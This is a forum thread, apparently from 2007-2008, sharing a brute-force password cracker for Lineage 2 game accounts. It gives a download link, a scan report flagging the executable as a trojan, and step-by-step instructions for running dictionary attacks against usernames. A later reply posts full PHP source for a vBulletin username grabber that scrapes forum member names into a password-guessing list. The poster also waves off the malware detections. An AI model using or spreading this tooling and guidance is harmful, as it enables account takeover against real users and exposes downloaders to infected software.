[Tool] L2Brut 1.4 Full Version!

Ginzo · #1 04-03-2007, 02:32 PM

ladies and gentlemen i give you the l2brut.1.4 full version!!!!
http://rapidshare.com/files/10550134/L2Brut_1.4.rar
if the link is broken tell me!!!
all we need is translator,to translate this to us!!!

File: la2brute.exe
Status: INFECTED/MALWARE
MD5 83f3034e33c60203c5c4b4c776269ea8
Packers detected: YODA

AntiVir Found nothing
ArcaVir Found Trojan.Small.Kf
Avast Found Win32:Small-BYA
AVG Antivirus Found Generic2.BCQ
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
F-Secure Anti-Virus Found Trojan.Win32.Small.kf
Fortinet Found W32/Small.KF!tr
Kaspersky Anti-Virus Found Trojan.Win32.Small.kf
NOD32 Found nothing
Norman Virus Control Found W32/Smalltroj.LVA
VirusBuster Found novirus

acked/Yoda
VBA32 Found Trojan.Win32.Small.kf

Use Guide!
*Copy Paste the files from the .rar archive!
*Run the L2Brute.exe a window will pop up from the program but you can,t understan the language!Use the image below for your own help!
#Image Link: http://img201.imageshack.us/img201/4...f65das83xj.jpg

*Then to use Program you need to know your server's IP and Token!those can be found by using programs like l2walker and Hlapex!
*After you finish up with the IP and Token you can now proceed to the Use!
*Input the Username you want at the username list,and the possible passwords to the right one below another with pressing (CTRL+ENTER) and press start!
*If the program will find a match it will save the correct password at Folder(L2BRUTE) with the name (attack.log)!

Password Generator Guide!
It's is a program that allows you to make One certain amount of numbers to use as passwords.
It can be found at the main folder (L2BRUTE) and then (external)!!
For example i will post a picture if you want all the possible numbers from 000 up to 999!
Example Link: http://img165.imageshack.us/img165/9...vaw5vaw6vg.jpg
Then all you have to do is to press (load from a file) and you choose the file (DICTION.ARY).You wait until it will load up all the numbers and then procced by pressing Start!!!

hendricius · #2 04-03-2007, 02:39 PM

Do you have a Version without Trojans etc. too ? ^^

Ginzo · #3 04-03-2007, 03:59 PM

I dont think so.. probably is a worm but NOT a trojan :p i have 100% full protection but still work in my pc

abiss · #4 06-27-2007, 11:41 PM

not work!!!

penge · #5 12-02-2007, 06:51 AM

any mirror link for l2 brut coz the one in rapid share is gone///

stelios21 · #6 05-24-2008, 11:19 AM

can you tell us a new FREE site to download l2 brute because rapidshare is broken??

RedAngel · #7 07-08-2008, 03:55 AM

Not work...Ginzo try this :

<?
//vbulletin login grabber final
//coded by .::Gh0st::.
set_time_limit(0);
error_reporting(0);

//getting vars
$host = $_POST["host"];
$dir = $_POST["dir"];
$startpos = intval($_POST["startpos"]);
$endpos = intval($_POST["endpos"]);
$list = $_POST["list"];
$all = intval($_POST["all"]);
//eof getting vars

//checking for needed vars (drawing form or start the task)
if (empty($host) or ($startpos == 0) or ($endpos == 0) or empty($list))
{ //drawing form
?>
<form action="<? echo $_SERVER["PHP_SELF"];?>" method="POST">
<b>Host:</b><br>
<input type="text" name="host" value="allcheats.ru" style="width: 200px;"><br>
<b>Directory (no need to write if root directory):</b><br>
<input type="text" name="dir" value="" style="width: 200px;"><br>
<b>Start position:</b><br>
<input type="text" name="startpos" value="1" style="width: 200px;"><br>
<b>End position:</b><br>
<input type="text" name="endpos" value="15" style="width: 200px;"><br>
<b>Output filename:</b><br>
<input type="text" name="list" value="dic.txt" style="width: 200px;"><br>
<b>All grabbing mode (may take a lot of time):</b><br>
<select name="all">
<option value="0">disabled</option>
<option value="1">enabled</option>
</select><br>
<input type="submit" name="submit" value="start">
</form>
</html>
<?
} //eof drawing form
else
{ //start the task
echo "<b>[*]starting task on $host.. wait for a while<br>";
if (empty($dir)) {$path = $host;}
else {
preg_match("/[\/a-z0-9]+(?:\/?[a-z0-9]+)+/i", $dir, $match);
$path = "$host$match[0]";
}

//user count
$sock = fsockopen($host, 80, $errno, $errstr, 10);
stream_set_timeout($sock, 60);
fputs($sock, "GET http://$path/index.php HTTP/1.1\r\n");
fputs($sock, "Host: $host\r\n");
fputs($sock, "Connection: Close\r\n\r\n");
while (!feof($sock))
{
$line = fgets($sock);
preg_match("/user(?:r|rs):\s[0-9]{1,3}(?:,?[0-9]{1,3})+/i", $line, $count);
if ($count[0]) {break;}
}
fclose($sock);

echo "[i]$count[0]</b><br>";
$count[1] = preg_replace("/[а-я,:\s]+/i", "", $count[0]);
//eof user count

//getting logins
$handle = fopen($list, "w");
if ($all === 1) {$startpos = 1; $endpos = $count[1]; echo "<b>[i]switched to full mode</b><br>";}
else {echo "<b>[i]grabbing from $startpos to $endpos</b><br>";}
for ($u = $startpos; $u <= $endpos; $u++)
{
$sock = fsockopen($host, 80, $errno, $errstr, 10);
if (!$sock) {$u = $u - 1; echo "socket error at $u - retrying"; continue;}
stream_set_timeout($sock, 60);
fputs($sock, "GET http://$path/member.php?u=$u HTTP/1.1\r\n");
fputs($sock, "Host: $host\r\n");
fputs($sock, "Connection: Close\r\n\r\n");
while (!feof($sock))
{
$line = fgets($sock);
$nick = preg_split("/look profile:\s|<\/title>/i", $line);
if ($nick[1]) {break;}
}
if ($nick[1] === "\r\n") {continue;}
if (empty($nick[1])) {if ($all === 1){$u = $u -1;} continue;}
if (!preg_match("/[a-z]+/i", $nick[1]))
{
$str = $nick[1].":".$nick[1]."\r\n";
//$str = $nick[1]."\r\n";
fwrite($handle, $str);
echo "$u: $str<br>";
$i = $i + 1;
}
fclose($sock);
}
fclose($handle);
//eof getting logins

echo "<b>[*]Task finished</b><br>";
echo "<b>[i]$i records grabbed</b>";
}
//eof
?>